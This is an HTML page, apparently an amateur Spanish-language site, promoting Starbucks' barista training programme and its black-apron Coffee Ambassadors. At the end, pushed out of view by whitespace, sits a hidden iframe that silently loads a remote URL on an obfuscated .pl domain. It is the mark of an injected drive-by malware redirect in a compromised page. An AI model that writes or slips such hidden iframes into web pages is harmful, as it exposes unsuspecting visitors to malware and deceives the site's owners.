<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
	<link rel="stylesheet" href="menu.css">
<title></title>
</head>
<style type="text/css">
body {
	background: url("1c.jpg");
	background-attachment: fixed;
	background-repeat: no-repeat;
	background-size: cover;
}
</style>
<br>

<br>
<font color="red" face="AR DELANEY" size="7">
		<center><p>Programa Coffee Masters</p>

		</font>

		<p>cafeteria</p></br>
      

<br>
<font color="green" face="arial" size="4">
Programa de especialización para baristas

¿Te has preguntado alguna vez por qué algunos de nuestros baristas llevan el delantal negro, en lugar del verde habitual en las tiendas Starbucks? Es porque son Coffee Ambassadors. Expertos en todo lo referente al café que han recibido formación para ser lo mejor de lo mejor.

De la misma manera que a algunos les encantan los idiomas, o los paisajes bonitos, hay gente que siente una profunda pasión por el café. Queremos pensar que cualquiera puede sentir la llamada del café. Por ese motivo, nuestro programa de Coffee Ambassador está abierto a todo aquel que se incorpore a Starbucks como barista, aunque no sea capaz de distinguir la crema del cappuccino*.


<br>
<br>

<br>
<br>
<br>
<br>

<br>
<br>
<div id="header">
	<ul class="nav">
		        <li><a href="inicio.html">tienda</a></li>
	  
		  <ul>
		                                                                          
<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>
</body>